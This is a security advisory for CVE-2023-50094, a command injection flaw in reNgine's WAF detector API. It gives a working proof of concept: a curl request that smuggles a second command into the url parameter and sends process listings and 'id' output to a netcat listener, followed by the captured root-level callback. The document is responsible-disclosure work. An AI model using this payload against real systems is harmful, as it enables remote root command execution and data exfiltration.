CVE-2023-50094 - OS Command Injection in reNgine
Table of Contents
Description #
An authenticated OS Command Injection vulnerability exists in multiple versions of reNgine including the latest release version v2.0.2
. By sending a crafted URL to the server, arbitrary OS commands may be injected into subprocess.check_output
and executed as the root
user on the web service container.
Location #
This vulnerability is present in the WAF Detect functionality of reNgine.
Endpoint | POST https://rengine/api/tools/waf_detector |
Parameter | url |
Proof of Concept #
0x01. Authenticate to reNgine.
0x02. Start a callback listener: sudo nc nvlp 80
.
0x03. Execute the following curl
command using the authenticated session cookie:
curl -k -b "sessionid=fykexm0q2eec5xrb8quu9r9talmin7nl" 'https://rengine/api/tools/waf_detector/?format=json&url=https://www.example.com;curl%20-X%20POST%20--data%20"$(ps%20-aux)"%20192.168.1.91/?`id`'
0x04. Receive the callback containing the output from executing id
and ps -aux
:
2023-12-28 12:00:46 CST:~$ netcat -nvlp 80
Connection from 192.168.1.131:32996
POST /?uid=0(root) HTTP/1.1
Host: 192.168.1.91
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 637
Content-Type: application/x-www-form-urlencoded
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4360 1920 ? Ss 18:00 0:00 /bin/bash /usr/src/app/entrypoint.sh
root 33 0.1 0.3 77312 54268 ? S 18:00 0:00 python3 manage.py runserver 0.0.0.0:8000
root 34 4.1 0.8 538428 137560 ? Sl 18:00 0:11 /usr/bin/python3 manage.py runserver 0.0.0.0:8000
root 107 0.0 0.0 2888 1152 ? S 18:05 0:00 /bin/sh -c wafw00f https://www.example.com;curl -X POST --data "$(ps -aux)" 192.168.1.91/?`id`
root 109 0.0 0.0 7436 2176 ? R 18:05 0:00 ps -aux
Impact #
An attacker with a valid session ID may execute arbitrary OS commands on the web service container of reNgine.
Recommended CVSSv3.1: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1
Disclosure Timeline #
- February 12, 2023 - Initial disclosure to project maintainer via huntr.dev in accordance with the project’s policy (https://huntr.com/bounties/c046c9b7-f397-4650-af3f-fa0451548452/)
- no response
- March 23, 2023 - Updated disclosure showing proof of concept is still valid using
master
commit:e3dc06a4ee08c6a1c5fa7d84d7a0de4dac93315a
- no response
- November 30, 2023 - Applied for CVE ID
- December 20, 2023 - Final attempt to contact maintainer
- no response
- December 28, 2023 - Public disclosure (current document)